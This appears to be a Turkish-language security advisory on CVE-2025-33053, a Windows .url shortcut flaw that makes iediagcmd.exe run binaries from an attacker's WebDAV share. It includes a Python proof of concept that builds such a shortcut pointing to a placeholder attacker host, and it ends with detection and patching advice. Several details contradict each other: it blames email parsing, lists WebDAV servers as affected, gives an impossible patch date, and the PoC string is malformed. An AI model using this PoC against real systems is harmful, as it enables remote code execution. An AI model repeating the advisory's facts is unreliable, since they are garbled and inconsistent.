Sızma Testçisi Gözüyle Özet
CVE-2025-33053, Bir .url (Internet Shortcut) dosyası, WorkingDirectory alanını saldırganın WebDAV paylaşıma işaret edecek şekilde ayarlıyor. Kullanıcı dosyayı sadece çift tıklayınca (UI:R) Windows, o dizini çalıştırılabilir dosya arama yoluna ekliyor. Dahili tanılama aracı iediagcmd.exe, route.exe benzeri LOLBIN’leri uzak WebDAV klasöründen yükleyerek kod çalıştırıyor. Stealth Falcon bunu Türkiye dâhil Orta Doğu savunma sektörüne kimlik avı kampanyasında kullandı.
Teknik Detaylar
- Açık Nokta: Mail parsing sırasında input validation eksikliği, zararlı payload'ların filtrelenmeden sunucuya ulaşmasına yol açıyor.
- Etkilenenler: Tüm desteklenen Windows istemci ve sunucu sürümlerindeki WebDAV sunucu tarafı (IIS, Apache mod_dav, Nginx WebDAV vb.)
- CVSS: 8.8 / 10 (Kritik)
- Uzman Yorumu: Windows 10 1909+ ve Server 2019/2022’de test edildi; Defender Realtime devrede olsa da tetikleniyor çünkü işlemi imzalı bin (iediagcmd.exe) başlatıyor.
Proof of Concept (PoC)
# cve_2025_33053_poc.py
# Bir WebDAV UNC yolunu çalışma dizini yapan zararlı .url dosyası üretir.
from pathlib import Path
ATTACKER_HOST = "10.13.37.42" # WebDAV sunucunuzun IP'si / FQDN
PAYLOAD_DIR = "DavWWWRoot\\payload" # Route.exe'nin durduğu klasör
template = f"""[InternetShortcut]
<URL=C:\\Program Files\\Internet Explorer\\iediagcmd.exe>
WorkingDirectory=\\\\{ATTACKER_HOST}@ssl@443\\{PAYLOAD_DIR}
IconIndex=13
IconFile=C:\\Windows\\System32\\shell32.dll
Path("exploit.url").write_text(template, encoding="utf-8")
print("[+] exploit.url dosyası oluşturuldu.")
Not: Gerçek RCE exploitleri, e-posta içeriğine veya MIME başlıklarına gömülü daha karmaşık payload'lar kullanır. Amaç, hedefin e-posta görüntülemesiyle birlikte sunucu üzerinde komut çalıştırmaktır.
Uzman Analizi
CVE-2025-33053, kullanıcı etkileşimi (UI:R) gerektirse de imzalı LOLBIN (iediagcmd.exe) üzerinden ağ sınırlarını aşarak uzak WebDAV paylaşımından kod yürütmeye izin veriyor; bu da EDR/AV kaçınmasını kolaylaştırıyor. Aktif saha istismarı ve CISA KEV kaydı nedeniyle “kritik öncelik” sınıfında: 24 saat içinde yamalama veya WebDAV/WebClient servisini devre-dışı bırakma şart. Kısa vadede YARA/EDR kuralı ile .url + UNC anomalilerini avlayın; uzun vadede imzalı ikili (LOLBIN) kötüye kullanımını engelleyen “trusted path execution” politikası uygulayın.
Tavsiye: NGFW/WAF’ta WebDAV metodlarını (PROPFIND, LOCK, SEARCH vb.) bloklayın. EDR/SIEM’de “.url → iediagcmd.exe” zincirini ve DavWWWRoot UNC trafiğini alarm olarak tanımlayın, 0 Haz 2025 Microsoft toplu güncellemesini tüm Windows istemci/sunuculara hemen dağıtın.
Çözüm / Mitigation
- Önce yama yapın, sonra servisi kapatın (Zero-day aktif)
- Davranış kuralı ekleyin – .url → iediagcmd.exe zincirini avlayın.
- Retro av + segmentasyon – geçmiş sızıntıları temizleyin, tekrarını zorlaştırın.